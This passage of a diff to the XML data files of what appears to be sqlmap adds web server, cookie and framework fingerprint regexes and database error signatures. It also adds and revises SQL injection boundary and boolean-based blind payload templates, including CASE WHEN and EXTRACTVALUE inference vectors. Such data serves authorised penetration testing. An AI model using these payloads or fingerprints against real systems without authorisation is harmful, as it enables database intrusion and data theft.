+    </regexp>
+
+    <regexp value="Apache/2\.4\.46 \(FreeBSD\)">
+        <info type="FreeBSD" release="13.0"/>
+    </regexp>
+
     <!-- Apache: Mandrake / Mandriva -->
 
     <regexp value="Apache/1\.3\.6 \(Unix\)\s+\(Mandrake/Linux\)">
@@ -559,6 +636,10 @@
         <info type="Linux" distrib="Red Hat" release="Enterprise 7" codename="Maipo"/>
     </regexp>
 
+    <regexp value="Apache/2\.4\.37 \(Red Hat\)">
+        <info type="Linux" distrib="Red Hat" release="Enterprise 8" codename="Ootpa"/>
+    </regexp>
+
     <!-- Apache: SuSE -->
 
     <regexp value="Apache/1\.3\.6 \(Unix\) \(SuSE/Linux\)">
@@ -678,6 +759,22 @@
         <info type="Linux" distrib="SuSE" release="13.2"/>
     </regexp>
 
+    <regexp value="Apache/2\.4\.16 \(Linux/SuSE\)">
+        <info type="Linux" distrib="SuSE" release="42.1"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.23 \(Linux/SuSE\)">
+        <info type="Linux" distrib="SuSE" release="42.2|42.3"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.33 \(Linux/SuSE\)">
+        <info type="Linux" distrib="SuSE" release="15"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.43 \(Linux/SuSE\)">
+        <info type="Linux" distrib="SuSE" release="15.3"/>
+    </regexp>
+
     <!-- Apache: Ubuntu -->
 
     <regexp value="Apache/2\.0\.50 \(Ubuntu\)">
@@ -753,12 +850,94 @@
     </regexp>
 
     <regexp value="Apache/2\.4\.18 \(Ubuntu\)">
-        <info type="Linux" distrib="Ubuntu" release="16.04" codename="xenial"/>
+        <info type="Linux" distrib="Ubuntu" release="16.04|16.10" codename="xenial|yakkety"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.25 \(Ubuntu\)">
+        <info type="Linux" distrib="Ubuntu" release="17.04" codename="zesty"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.27 \(Ubuntu\)">
+        <info type="Linux" distrib="Ubuntu" release="17.10" codename="artful"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.29 \(Ubuntu\)">
+        <info type="Linux" distrib="Ubuntu" release="18.04" codename="bionic"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.34 \(Ubuntu\)">
+        <info type="Linux" distrib="Ubuntu" release="18.10" codename="cosmic"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.38 \(Ubuntu\)">
+        <info type="Linux" distrib="Ubuntu" release="19.04" codename="disco"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.41 \(Ubuntu\)">
+        <info type="Linux" distrib="Ubuntu" release="19.10|20.04|20.10" codename="eoan|focal"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.46 \(Ubuntu\)">
+        <info type="Linux" distrib="Ubuntu" release="21.04|21.10" codename="hirsute|impish"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.52 \(Ubuntu\)">
+        <info type="Linux" distrib="Ubuntu" release="22.04" codename="jammy"/>
     </regexp>
 
     <!-- Nginx -->
 
-    <regexp value="nginx/([\w\.]+)">
+    <regexp value="nginx$">
         <info technology="Nginx"/>
     </regexp>
+
+    <regexp value="nginx/([\w\.]+)">
+        <info technology="Nginx" tech_version="1"/>
+    </regexp>
+
+    <!-- Google Web Server -->
+
+    <regexp value="GWS$">
+        <info technology="Google Web Server"/>
+    </regexp>
+
+    <regexp value="GWS/([\w\.]+)">
+        <info technology="Google Web Server" tech_version="1"/>
+    </regexp>
+
+    <!-- lighttpd -->
+
+    <regexp value="lighttpd$">
+        <info technology="lighttpd"/>
+    </regexp>
+
+    <regexp value="lighttpd/([\w\.]+)">
+        <info technology="lighttpd" tech_version="1"/>
+    </regexp>
+
+    <!-- OpenResty -->
+
+    <regexp value="openresty$">
+        <info technology="OpenResty"/>
+    </regexp>
+
+    <regexp value="openresty/([\w\.]+)">
+        <info technology="OpenResty" tech_version="1"/>
+    </regexp>
+
+    <!-- LiteSpeed -->
+
+    <regexp value="LiteSpeed$">
+        <info technology="LiteSpeed"/>
+    </regexp>
+
+    <regexp value="LiteSpeed/([\w\.]+)">
+        <info technology="LiteSpeed" tech_version="1"/>
+    </regexp>
+
+    <!-- Sun ONE -->
+
+    <regexp value="Sun-ONE-Web-Server/([\w\.]+)">
+        <info technology="Sun ONE" tech_version="1"/>
+    </regexp>
 </root>

data/xml/banner/servlet-engine.xml

@@ -3,10 +3,18 @@
 <!-- Reference: http://www.http-stats.com/Servlet-Engine -->
 
 <root>
-    <regexp value="Tomcat( Web Server)*\/([\d\.]+)">
+    <regexp value="Tomcat( Web Server)?\/([\d\.]+)">
         <info technology="Tomcat" tech_version="1"/>
     </regexp>
 
+    <regexp value="Enhydra Application Server/([\d\.]+)">
+        <info technology="Enhydra" tech_version="1"/>
+    </regexp>
+
+    <regexp value="Jetty/([\d\.]+)">
+        <info technology="Jetty" tech_version="1"/>
+    </regexp>
+
     <regexp value="JSP[\-\_\/\ ]([\d\.]+)">
         <info technology="JSP" tech_version="1"/>
     </regexp>

data/xml/banner/set-cookie.xml

@@ -0,0 +1,65 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<!--
+     References:
+     * http://www.http-stats.com/Set-Cookie2
+     * http://www.owasp.org/index.php/Category:OWASP_Cookies_Database
+-->
+
+<root>
+    <regexp value="ASPSESSIONID">
+        <info technology="ASP" type="Windows"/>
+    </regexp>
+
+    <regexp value="ASP\.NET_SessionId|\.ASPXAUTH">
+        <info technology="ASP.NET" type="Windows"/>
+    </regexp>
+
+    <regexp value="JSESSIONID">
+        <info technology="JSP"/>
+    </regexp>
+
+    <regexp value="JServSessionId">
+        <info technology="JServ"/>
+    </regexp>
+
+    <regexp value="Ltpatoken">
+        <info technology="WebSphere"/>
+    </regexp>
+
+    <regexp value="PHPSESS">
+        <info technology="PHP"/>
+    </regexp>
+
+    <regexp value="RoxenUserID">
+        <info technology="Roxen"/>
+    </regexp>
+
+    <regexp value="wiki\d+_session">
+        <info technology="MediaWiki"/>
+    </regexp>
+
+    <regexp value="Apache">
+        <info technology="Apache"/>
+    </regexp>
+
+    <regexp value="DomAuthSessID">
+        <info technology="Domino|Notes"/>
+    </regexp>
+
+    <regexp value="CFID|CFTOKEN|CFMAGIC|CFGLOBALS">
+        <info technology="ColdFusion"/>
+    </regexp>
+
+    <regexp value="WebLogicSession">
+        <info technology="WebLogic"/>
+    </regexp>
+
+    <regexp value="MoodleSession">
+        <info technology="Moodle"/>
+    </regexp>
+
+    <regexp value="\bwp_">
+        <info technology="WordPress"/>
+    </regexp>
+</root>

data/xml/banner/x-powered-by.xml

@@ -0,0 +1,65 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<!-- Reference: https://publicwww.com/popular/powered/index.html -->
+
+<root>
+    <regexp value="PHP[\-\_\/\ ]([\d\.]+)">
+        <info technology="PHP" tech_version="1"/>
+    </regexp>
+
+    <regexp value="JSP[\-\_\/\ ]([\d\.]+)">
+        <info technology="JSP" tech_version="1"/>
+    </regexp>
+
+    <regexp value="ASP[\/\d\.]*$">
+        <info technology="ASP" type="Windows"/>
+    </regexp>
+
+    <regexp value="EasyEngine ([\d\.]+)">
+        <info technology="EasyEngine" tech_version="1"/>
+    </regexp>
+
+    <regexp value="Phusion Passenger ([\d\.]+)">
+        <info technology="Phusion Passenger" tech_version="1"/>
+    </regexp>
+
+    <regexp value="Craft CMS">
+        <info technology="Craft CMS"/>
+    </regexp>
+
+    <regexp value="Express">
+        <info technology="Express"/>
+    </regexp>
+
+    <regexp value="WP Engine">
+        <info technology="WP Engine"/>
+    </regexp>
+
+    <regexp value="PleskLin">
+        <info technology="Plesk" type="Linux"/>
+    </regexp>
+
+    <regexp value="PleskWin">
+        <info technology="Plesk" type="Windows"/>
+    </regexp>
+
+    <regexp value="ThinkPHP">
+        <info technology="ThinkPHP"/>
+    </regexp>
+
+    <regexp value="ASP\.NET">
+        <info technology="ASP.NET" type="Windows"/>
+    </regexp>
+
+    <regexp value="Tomcat[\-\_\/\ ]?([\d\.]+)">
+        <info technology="Tomcat" tech_version="1"/>
+    </regexp>
+
+    <regexp value="JBoss[\-\_\/\ ]?([\d\.]+)">
+        <info technology="JBoss" tech_version="1"/>
+    </regexp>
+
+    <regexp value="Servlet[\-\_\/\ ]?([\d\.]+)">
+        <info technology="Servlet" tech_version="1"/>
+    </regexp>
+</root>

data/xml/boundaries.xml

@@ -54,6 +54,7 @@ Tag: <boundary>
             3: LIKE single quoted string
             4: Double quoted string
             5: LIKE double quoted string
+            6: Identifier (e.g. column name)
 
     Sub-tag: <prefix>
         A string to prepend to the payload.
@@ -212,6 +213,15 @@ Formats:
         <suffix> AND ((('[RANDSTR]' LIKE '[RANDSTR]</suffix>
     </boundary>
 
+    <boundary>
+        <level>2</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>3</ptype>
+        <prefix>%'</prefix>
+        <suffix> AND '[RANDSTR]%'='[RANDSTR]</suffix>
+    </boundary>
+
     <boundary>
         <level>2</level>
         <clause>1</clause>
@@ -293,78 +303,6 @@ Formats:
         <suffix> AND "[RANDSTR]" LIKE "[RANDSTR]</suffix>
     </boundary>
 
-    <boundary>
-        <level>2</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>2</ptype>
-        <prefix>%')</prefix>
-        <suffix> AND ('%'='</suffix>
-    </boundary>
-
-    <boundary>
-        <level>3</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>2</ptype>
-        <prefix>%'))</prefix>
-        <suffix> AND (('%'='</suffix>
-    </boundary>
-
-    <boundary>
-        <level>4</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>2</ptype>
-        <prefix>%')))</prefix>
-        <suffix> AND ((('%'='</suffix>
-    </boundary>
-
-    <boundary>
-        <level>1</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>2</ptype>
-        <prefix>%'</prefix>
-        <suffix> AND '%'='</suffix>
-    </boundary>
-
-    <boundary>
-        <level>4</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>2</ptype>
-        <prefix>%")</prefix>
-        <suffix> AND ("%"="</suffix>
-    </boundary>
-
-    <boundary>
-        <level>5</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>2</ptype>
-        <prefix>%"))</prefix>
-        <suffix> AND (("%"="</suffix>
-    </boundary>
-
-    <boundary>
-        <level>5</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>2</ptype>
-        <prefix>%")))</prefix>
-        <suffix> AND ((("%"="</suffix>
-    </boundary>
-
-    <boundary>
-        <level>3</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>2</ptype>
-        <prefix>%"</prefix>
-        <suffix> AND "%"="</suffix>
-    </boundary>
-
     <boundary>
         <level>1</level>
         <clause>1</clause>
@@ -382,6 +320,16 @@ Formats:
         <prefix></prefix>
         <suffix># [RANDSTR]</suffix>
     </boundary>
+
+    <!--     e.g. admin' AND [INFERENCE] OR 'foo'='bar' AND password=$password -->
+    <boundary>
+        <level>3</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>'</prefix>
+        <suffix> OR '[RANDSTR1]'='[RANDSTR2]</suffix>
+    </boundary>
     <!-- End of WHERE/HAVING clause boundaries -->
 
     <!-- Pre-WHERE generic boundaries (e.g. "UPDATE table SET '$_REQUEST["name"]' WHERE id=1" or "INSERT INTO table VALUES('$_REQUEST["value"]') WHERE id=1)"-->
@@ -439,6 +387,15 @@ Formats:
         <suffix>[GENERIC_SQL_COMMENT]</suffix>
     </boundary>
 
+    <boundary>
+        <level>5</level>
+        <clause>9</clause>
+        <where>1</where>
+        <ptype>2</ptype>
+        <prefix>'||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>)||'</suffix>
+    </boundary>
+
     <boundary>
         <level>5</level>
         <clause>9</clause>
@@ -453,16 +410,7 @@ Formats:
         <clause>9</clause>
         <where>1</where>
         <ptype>2</ptype>
-        <prefix>'||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <prefix>'+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
-        <suffix>)||'</suffix>
-    </boundary>
-
-    <boundary>
-        <level>5</level>
-        <clause>9</clause>
-        <where>1</where>
-        <ptype>1</ptype>
-        <prefix>'+(SELECT [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
         <suffix>)+'</suffix>
     </boundary>
 
@@ -471,8 +419,35 @@ Formats:
         <clause>9</clause>
         <where>1</where>
         <ptype>2</ptype>
-        <prefix>'+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <prefix>||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>
-        <suffix>)+'</suffix>
+        <suffix>)||</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>9</clause>
+        <where>1</where>
+        <ptype>2</ptype>
+        <prefix>||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>)||</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>9</clause>
+        <where>1</where>
+        <ptype>1</ptype>
+        <prefix>+(SELECT [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>)+</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>9</clause>
+        <where>1</where>
+        <ptype>2</ptype>
+        <prefix>+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>)+</suffix>
     </boundary>
     <!-- End of pre-WHERE generic boundaries -->
 
@@ -550,6 +525,44 @@ Formats:
     </boundary>
     <!-- End of pre-WHERE derived table boundaries -->
 
+    <!-- Escaped column name (e.g. SELECT `...` FROM table) boundaries -->
+    <boundary>
+        <level>4</level>
+        <clause>8</clause>
+        <where>1</where>
+        <ptype>6</ptype>
+        <prefix>`=`[ORIGINAL]`</prefix>
+        <suffix> AND `[ORIGINAL]`=`[ORIGINAL]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>8</clause>
+        <where>1</where>
+        <ptype>6</ptype>
+        <prefix>"="[ORIGINAL]"</prefix>
+        <suffix> AND "[ORIGINAL]"="[ORIGINAL]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>8</clause>
+        <where>1</where>
+        <ptype>6</ptype>
+        <prefix>]-(SELECT 0 WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>)|[[ORIGINAL]</suffix>
+    </boundary>
+    <!-- End of escaped column name boundaries -->
+
+    <boundary>
+        <level>5</level>
+        <clause>7</clause>
+        <where>1</where>
+        <ptype>3</ptype>
+        <prefix> [RANDSTR1],</prefix>
+        <suffix> [RANDSTR2]</suffix>
+    </boundary>
+
     <!-- AGAINST boolean full-text search boundaries (http://dev.mysql.com/doc/refman/5.5/en/fulltext-boolean.html) -->
     <boundary>
         <level>4</level>

data/xml/errors.xml

@@ -0,0 +1,240 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<root>
+    <dbms value="MySQL">
+        <error regexp="SQL syntax.*?MySQL"/>
+        <error regexp="Warning.*?\Wmysqli?_"/>
+        <error regexp="MySQLSyntaxErrorException"/>
+        <error regexp="valid MySQL result"/>
+        <error regexp="check the manual that (corresponds to|fits) your MySQL server version"/>
+        <error regexp="check the manual that (corresponds to|fits) your MariaDB server version" fork="MariaDB"/>
+        <error regexp="check the manual that (corresponds to|fits) your Drizzle server version" fork="Drizzle"/>
+        <error regexp="Unknown column '[^ ]+' in 'field list'"/>
+        <error regexp="MySqlClient\."/>
+        <error regexp="com\.mysql\.jdbc"/>
+        <error regexp="Zend_Db_(Adapter|Statement)_Mysqli_Exception"/>
+        <error regexp="Pdo[./_\\]Mysql"/>
+        <error regexp="MySqlException"/>
+        <error regexp="SQLSTATE\[\d+\]: Syntax error or access violation"/>
+        <error regexp="MemSQL does not support this type of query" fork="MemSQL"/>
+        <error regexp="is not supported by MemSQL" fork="MemSQL"/>
+        <error regexp="unsupported nested scalar subselect" fork="MemSQL"/>
+    </dbms>
+
+    <dbms value="PostgreSQL">
+        <error regexp="PostgreSQL.*?ERROR"/>
+        <error regexp="Warning.*?\Wpg_"/>
+        <error regexp="valid PostgreSQL result"/>
+        <error regexp="Npgsql\."/>
+        <error regexp="PG::SyntaxError:"/>
+        <error regexp="org\.postgresql\.util\.PSQLException"/>
+        <error regexp="ERROR:\s\ssyntax error at or near"/>
+        <error regexp="ERROR: parser: parse error at or near"/>
+        <error regexp="PostgreSQL query failed"/>
+        <error regexp="org\.postgresql\.jdbc"/>
+        <error regexp="Pdo[./_\\]Pgsql"/>
+        <error regexp="PSQLException"/>
+    </dbms>
+
+    <dbms value="Microsoft SQL Server">
+        <error regexp="Driver.*? SQL[\-\_\ ]*Server"/>
+        <error regexp="OLE DB.*? SQL Server"/>
+        <error regexp="\bSQL Server[^&lt;&quot;]+Driver"/>
+        <error regexp="Warning.*?\W(mssql|sqlsrv)_"/>
+        <error regexp="\bSQL Server[^&lt;&quot;]+[0-9a-fA-F]{8}"/>
+        <error regexp="System\.Data\.SqlClient\.(SqlException|SqlConnection\.OnError)"/>
+        <error regexp="(?s)Exception.*?\bRoadhouse\.Cms\."/>
+        <error regexp="Microsoft SQL Native Client error '[0-9a-fA-F]{8}"/>
+        <error regexp="\[SQL Server\]"/>
+        <error regexp="ODBC SQL Server Driver"/>
+        <error regexp="ODBC Driver \d+ for SQL Server"/>
+        <error regexp="SQLServer JDBC Driver"/>
+        <error regexp="com\.jnetdirect\.jsql"/>
+        <error regexp="macromedia\.jdbc\.sqlserver"/>
+        <error regexp="Zend_Db_(Adapter|Statement)_Sqlsrv_Exception"/>
+        <error regexp="com\.microsoft\.sqlserver\.jdbc"/>
+        <error regexp="Pdo[./_\\](Mssql|SqlSrv)"/>
+        <error regexp="SQL(Srv|Server)Exception"/>
+        <error regexp="Unclosed quotation mark after the character string"/>
+    </dbms>
+
+    <dbms value="Microsoft Access">
+        <error regexp="Microsoft Access (\d+ )?Driver"/>
+        <error regexp="JET Database Engine"/>
+        <error regexp="Access Database Engine"/>
+        <error regexp="ODBC Microsoft Access"/>
+        <error regexp="Syntax error \(missing operator\) in query expression"/>
+    </dbms>
+
+    <dbms value="Oracle">
+        <error regexp="\bORA-\d{5}"/>
+        <error regexp="Oracle error"/>
+        <error regexp="Oracle.*?Driver"/>
+        <error regexp="Warning.*?\W(oci|ora)_"/>
+        <error regexp="quoted string not properly terminated"/>
+        <error regexp="SQL command not properly ended"/>
+        <error regexp="macromedia\.jdbc\.oracle"/>
+        <error regexp="oracle\.jdbc"/>
+        <error regexp="Zend_Db_(Adapter|Statement)_Oracle_Exception"/>
+        <error regexp="Pdo[./_\\](Oracle|OCI)"/>
+        <error regexp="OracleException"/>
+    </dbms>
+
+    <dbms value="IBM DB2">
+        <error regexp="CLI Driver.*?DB2"/>
+        <error regexp="DB2 SQL error"/>
+        <error regexp="\bdb2_\w+\("/>
+        <error regexp="SQLCODE[=:\d, -]+SQLSTATE"/>
+        <error regexp="com\.ibm\.db2\.jcc"/>
+        <error regexp="Zend_Db_(Adapter|Statement)_Db2_Exception"/>
+        <error regexp="Pdo[./_\\]Ibm"/>
+        <error regexp="DB2Exception"/>
+        <error regexp="ibm_db_dbi\.ProgrammingError"/>
+    </dbms>
+
+    <dbms value="Informix">
+        <error regexp="Warning.*?\Wifx_"/>
+        <error regexp="Exception.*?Informix"/>
+        <error regexp="Informix ODBC Driver"/>
+        <error regexp="ODBC Informix driver"/>
+        <error regexp="com\.informix\.jdbc"/>
+        <error regexp="weblogic\.jdbc\.informix"/>
+        <error regexp="Pdo[./_\\]Informix"/>
+        <error regexp="IfxException"/>
+    </dbms>
+
+    <!-- Interbase/Firebird -->
+    <dbms value="Firebird">
+        <error regexp="Dynamic SQL Error"/>
+        <error regexp="Warning.*?\Wibase_"/>
+        <error regexp="org\.firebirdsql\.jdbc"/>
+        <error regexp="Pdo[./_\\]Firebird"/>
+    </dbms>
+
+    <dbms value="SQLite">
+        <error regexp="SQLite/JDBCDriver"/>
+        <error regexp="SQLite\.Exception"/>
+        <error regexp="(Microsoft|System)\.Data\.SQLite\.SQLiteException"/>
+        <error regexp="Warning.*?\W(sqlite_|SQLite3::)"/>
+        <error regexp="\[SQLITE_ERROR\]"/>
+        <error regexp="SQLite error \d+:"/>
+        <error regexp="sqlite3.OperationalError:"/>
+        <error regexp="SQLite3::SQLException"/>
+        <error regexp="org\.sqlite\.JDBC"/>
+        <error regexp="Pdo[./_\\]Sqlite"/>
+        <error regexp="SQLiteException"/>
+    </dbms>
+
+    <dbms value="SAP MaxDB">
+        <error regexp="SQL error.*?POS([0-9]+)"/>
+        <error regexp="Warning.*?\Wmaxdb_"/>
+        <error regexp="DriverSapDB"/>
+        <error regexp="-3014.*?Invalid end of SQL statement"/>
+        <error regexp="com\.sap\.dbtech\.jdbc"/>
+        <error regexp="\[-3008\].*?: Invalid keyword or missing delimiter"/>
+    </dbms>
+
+    <dbms value="Sybase">
+        <error regexp="Warning.*?\Wsybase_"/>
+        <error regexp="Sybase message"/>
+        <error regexp="Sybase.*?Server message"/>
+        <error regexp="SybSQLException"/>
+        <error regexp="Sybase\.Data\.AseClient"/>
+        <error regexp="com\.sybase\.jdbc"/>
+    </dbms>
+
+    <dbms value="Ingres">
+        <error regexp="Warning.*?\Wingres_"/>
+        <error regexp="Ingres SQLSTATE"/>
+        <error regexp="Ingres\W.*?Driver"/>
+        <error regexp="com\.ingres\.gcf\.jdbc"/>
+    </dbms>
+
+    <dbms value="FrontBase">
+        <error regexp="Exception (condition )?\d+\. Transaction rollback"/>
+        <error regexp="com\.frontbase\.jdbc"/>
+        <error regexp="Syntax error 1. Missing"/>
+        <error regexp="(Semantic|Syntax) error [1-4]\d{2}\."/>
+    </dbms>
+
+    <dbms value="HSQLDB">
+        <error regexp="Unexpected end of command in statement \["/>
+        <error regexp="Unexpected token.*?in statement \["/>
+        <error regexp="org\.hsqldb\.jdbc"/>
+    </dbms>
+
+    <dbms value="H2">
+        <error regexp="org\.h2\.jdbc"/>
+        <error regexp="\[42000-192\]"/>
+    </dbms>
+
+    <dbms value="MonetDB">
+        <error regexp="![0-9]{5}![^\n]+(failed|unexpected|error|syntax|expected|violation|exception)"/>
+        <error regexp="\[MonetDB\]\[ODBC Driver"/>
+        <error regexp="nl\.cwi\.monetdb\.jdbc"/>
+    </dbms>
+
+    <dbms value="Apache Derby">
+        <error regexp="Syntax error: Encountered"/>
+        <error regexp="org\.apache\.derby"/>
+        <error regexp="ERROR 42X01"/>
+    </dbms>
+
+    <dbms value="Vertica">
+        <error regexp=", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):"/>
+        <error regexp="/vertica/Parser/scan"/>
+        <error regexp="com\.vertica\.jdbc"/>
+        <error regexp="org\.jkiss\.dbeaver\.ext\.vertica"/>
+        <error regexp="com\.vertica\.dsi\.dataengine"/>
+    </dbms>
+
+    <dbms value="Mckoi">
+        <error regexp="com\.mckoi\.JDBCDriver"/>
+        <error regexp="com\.mckoi\.database\.jdbc"/>
+        <error regexp="&lt;REGEX_LITERAL&gt;"/>
+    </dbms>
+
+    <dbms value="Presto">
+        <error regexp="com\.facebook\.presto\.jdbc"/>
+        <error regexp="io\.prestosql\.jdbc"/>
+        <error regexp="com\.simba\.presto\.jdbc"/>
+        <error regexp="UNION query has different number of fields: \d+, \d+"/>
+        <error regexp="line \d+:\d+: mismatched input '[^']+'. Expecting:"/>
+    </dbms>
+
+    <dbms value="Altibase">
+        <error regexp="Altibase\.jdbc\.driver"/>
+    </dbms>
+
+    <dbms value="MimerSQL">
+        <error regexp="com\.mimer\.jdbc"/>
+        <error regexp="Syntax error,[^\n]+assumed to mean"/>
+    </dbms>
+
+    <dbms value="ClickHouse">
+        <error regexp="Code: \d+. DB::Exception:"/>
+        <error regexp="Syntax error: failed at position \d+"/>
+    </dbms>
+
+    <dbms value="CrateDB">
+        <error regexp="io\.crate\.client\.jdbc"/>
+    </dbms>
+
+    <dbms value="Cache">
+        <error regexp="encountered after end of query"/>
+        <error regexp="A comparison operator is required here"/>
+    </dbms>
+
+    <dbms value="Raima Database Manager">
+        <error regexp="-10048: Syntax error"/>
+        <error regexp="rdmStmtPrepare\(.+?\) returned"/>
+    </dbms>
+
+    <dbms value="Virtuoso">
+        <error regexp="SQ074: Line \d+:"/>
+        <error regexp="SR185: Undefined procedure"/>
+        <error regexp="SQ200: No table "/>
+        <error regexp="Virtuoso S0002 Error"/>
+        <error regexp="\[(Virtuoso Driver|Virtuoso iODBC Driver)\]\[Virtuoso Server\]"/>
+    </dbms>
+</root>

data/xml/payloads/boolean_blind.xml

@@ -160,7 +160,7 @@ Tag: <test>
         <stype>1</stype>
         <level>1</level>
         <risk>1</risk>
-        <clause>1,9</clause>
+        <clause>1,8,9</clause>
         <where>1</where>
         <vector>AND [INFERENCE]</vector>
         <request>
@@ -204,7 +204,41 @@ Tag: <test>
     </test>
 
     <test>
-        <title>AND boolean-based blind - WHERE or HAVING clause (Generic comment)</title>
+        <title>AND boolean-based blind - WHERE or HAVING clause (subquery - comment)</title>
+        <stype>1</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,8,9</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))</vector>
+        <request>
+            <payload>AND [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))</payload>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
+        </request>
+        <response>
+            <comparison>AND [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))</comparison>
+        </response>
+    </test>
+
+    <test>
+        <title>OR boolean-based blind - WHERE or HAVING clause (subquery - comment)</title>
+        <stype>1</stype>
+        <level>2</level>
+        <risk>3</risk>
+        <clause>1,9</clause>
+        <where>2</where>
+        <vector>OR [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))</vector>
+        <request>
+            <payload>OR [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))</payload>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
+        </request>
+        <response>
+            <comparison>OR [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))</comparison>
+        </response>
+    </test>
+
+    <test>
+        <title>AND boolean-based blind - WHERE or HAVING clause (comment)</title>
         <stype>1</stype>
         <level>2</level>
         <risk>1</risk>
@@ -221,7 +255,7 @@ Tag: <test>
     </test>
 
     <test>
-        <title>OR boolean-based blind - WHERE or HAVING clause (Generic comment)</title>
+        <title>OR boolean-based blind - WHERE or HAVING clause (comment)</title>
         <stype>1</stype>
         <level>2</level>
         <risk>3</risk>
@@ -238,7 +272,7 @@ Tag: <test>
     </test>
 
     <test>
-        <title>OR boolean-based blind - WHERE or HAVING clause (Generic comment) (NOT)</title>
+        <title>OR boolean-based blind - WHERE or HAVING clause (NOT - comment)</title>
         <stype>1</stype>
         <level>4</level>
         <risk>3</risk>
@@ -295,7 +329,7 @@ Tag: <test>
     </test>
 
     <test>
-        <title>OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)</title>
+        <title>OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)</title>
         <stype>1</stype>
         <level>3</level>
         <risk>3</risk>
@@ -378,7 +412,7 @@ Tag: <test>
         <stype>1</stype>
         <level>3</level>
         <risk>1</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,8</clause>
         <where>1</where>
         <vector>AND MAKE_SET([INFERENCE],[RANDNUM])</vector>
         <request>
@@ -416,7 +450,7 @@ Tag: <test>
         <stype>1</stype>
         <level>4</level>
         <risk>1</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,8</clause>
         <where>1</where>
         <vector>AND ELT([INFERENCE],[RANDNUM])</vector>
         <request>
@@ -450,18 +484,18 @@ Tag: <test>
     </test>
 
     <test>
-        <title>MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)</title>
+        <title>MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)</title>
         <stype>1</stype>
         <level>5</level>
         <risk>1</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,8</clause>
         <where>1</where>
-        <vector>AND ([INFERENCE])*[RANDNUM]</vector>
+        <vector>AND EXTRACTVALUE([RANDNUM],CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 0x3A END)</vector>
         <request>
-            <payload>AND ([RANDNUM]=[RANDNUM])*[RANDNUM1]</payload>
+            <payload>AND EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 0x3A END)</payload>
         </request>
         <response>
-            <comparison>AND ([RANDNUM]=[RANDNUM1])*[RANDNUM1]</comparison>
